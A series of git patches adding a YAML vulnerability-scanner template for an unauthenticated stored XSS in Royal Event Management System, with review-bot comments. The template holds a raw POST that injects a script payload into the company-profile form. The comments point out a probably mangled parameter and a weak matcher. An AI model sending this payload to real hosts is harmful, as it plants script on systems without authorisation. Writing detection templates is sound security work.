From 679bc9198e0fbe27fa1bacd6b3c5e3bb4439aab2 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 23 Jun 2022 13:00:43 +0530
Subject: [PATCH 1/3] Create royalevent-management-xss.yaml
---
.../other/royalevent-management-xss.yaml | 30 +++++++++++++++++++
1 file changed, 30 insertions(+)
create mode 100644 vulnerabilities/other/royalevent-management-xss.yaml
diff --git a/vulnerabilities/other/royalevent-management-xss.yaml b/vulnerabilities/other/royalevent-management-xss.yaml
new file mode 100644
index 0000000000..35cb99ef0f
--- /dev/null
+++ b/vulnerabilities/other/royalevent-management-xss.yaml
@@ -0,0 +1,30 @@
+id: royalevent-management-xss
+
+info:
+ name: Royale Event - Stored Cross-site Scripting (Unauthenticated)
+ author: ritikchaddha
+ severity: high
+ description: |
+ Detects an XSS vulnerability in Royal Event System
+ reference:
+ - https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
+ - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
+ tags: xss,unauthenticated,cms,royalevent
+
+requests:
+ - raw:
+ - |
+ POST /royal_event/companyprofile.php HTTP/1.1
+ Host: {{Hostname}}
+
+ companyname=%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E®no=test&companyaddress=&companyemail=&country=India&mobilenumber=1234567899&submit=
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+
+ - type: status
+ status:
+ - 302
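Review bot: The raw POST to `companyprofile.php` writes a script payload into the target's stored company profile, so every scan of a vulnerable host leaves that payload behind, yet the `tags` line does not mark the template as state-changing. Using `tags: xss,unauthenticated,cms,royalevent,intrusive` would let operators exclude it from routine or production scans. The request also carries no `Content-Type` header, and a PHP handler normally parses a form body only when one is present, so `Content-Type: application/x-www-form-urlencoded` after the `Host` line looks necessary unless the engine adds it. In the body, `®no=test` appears to be a mangled `&regno=test` and should be checked against the file itself.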
From 98034728fc405e5a70a1b24980d4d30b18659d95 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 24 Jun 2022 00:10:24 +0530
Subject: [PATCH 2/3] Update and rename
vulnerabilities/other/royalevent-management-xss.yaml to
vulnerabilities/other/royalevent/royalevent-management-xss.yaml
---
.../other/{ => royalevent}/royalevent-management-xss.yaml | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
rename vulnerabilities/other/{ => royalevent}/royalevent-management-xss.yaml (90%)
diff --git a/vulnerabilities/other/royalevent-management-xss.yaml b/vulnerabilities/other/royalevent/royalevent-management-xss.yaml
similarity index 90%
rename from vulnerabilities/other/royalevent-management-xss.yaml
rename to vulnerabilities/other/royalevent/royalevent-management-xss.yaml
index 35cb99ef0f..e55b5e1137 100644
--- a/vulnerabilities/other/royalevent-management-xss.yaml
+++ b/vulnerabilities/other/royalevent/royalevent-management-xss.yaml
@@ -9,6 +9,8 @@ info:
reference:
- https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
+ metadata:
+ verified: true
tags: xss,unauthenticated,cms,royalevent
requests:
@@ -23,7 +25,7 @@ requests:
matchers:
- type: word
words:
- - ""
+ - 'value=">" >'
- type: status
status:
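Review bot: The replacement word in the `type: word` matcher, shown here as `value=">" >`, contains nothing of the submitted `companyname` value. If that is the literal string in the file, the template will report any 302 response whose body happens to render an attribute that way; the markup may have been lost in rendering, so confirm against the file. The word should carry the injected marker itself, and the matcher should state `part: body` explicitly rather than rely on the default. A further `type: word` matcher with `part: header` for `text/html` would cut false positives from non-HTML responses. The `requests` block begins outside this hunk.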
From 5376bf09d35674d66423c78022da137539faeb51 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 24 Jun 2022 00:15:44 +0530
Subject: [PATCH 3/3] Update and rename royalevent-management-xss.yaml to
royalevent-stored-xss.yaml
---
...oyalevent-management-xss.yaml => royalevent-stored-xss.yaml} | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
rename vulnerabilities/other/royalevent/{royalevent-management-xss.yaml => royalevent-stored-xss.yaml} (96%)
diff --git a/vulnerabilities/other/royalevent/royalevent-management-xss.yaml b/vulnerabilities/other/royalevent/royalevent-stored-xss.yaml
similarity index 96%
rename from vulnerabilities/other/royalevent/royalevent-management-xss.yaml
rename to vulnerabilities/other/royalevent/royalevent-stored-xss.yaml
index e55b5e1137..601e0fc7a3 100644
--- a/vulnerabilities/other/royalevent/royalevent-management-xss.yaml
+++ b/vulnerabilities/other/royalevent/royalevent-stored-xss.yaml
@@ -1,4 +1,4 @@
-id: royalevent-management-xss
+id: royalevent-stored-xss
info:
name: Royale Event - Stored Cross-site Scripting (Unauthenticated)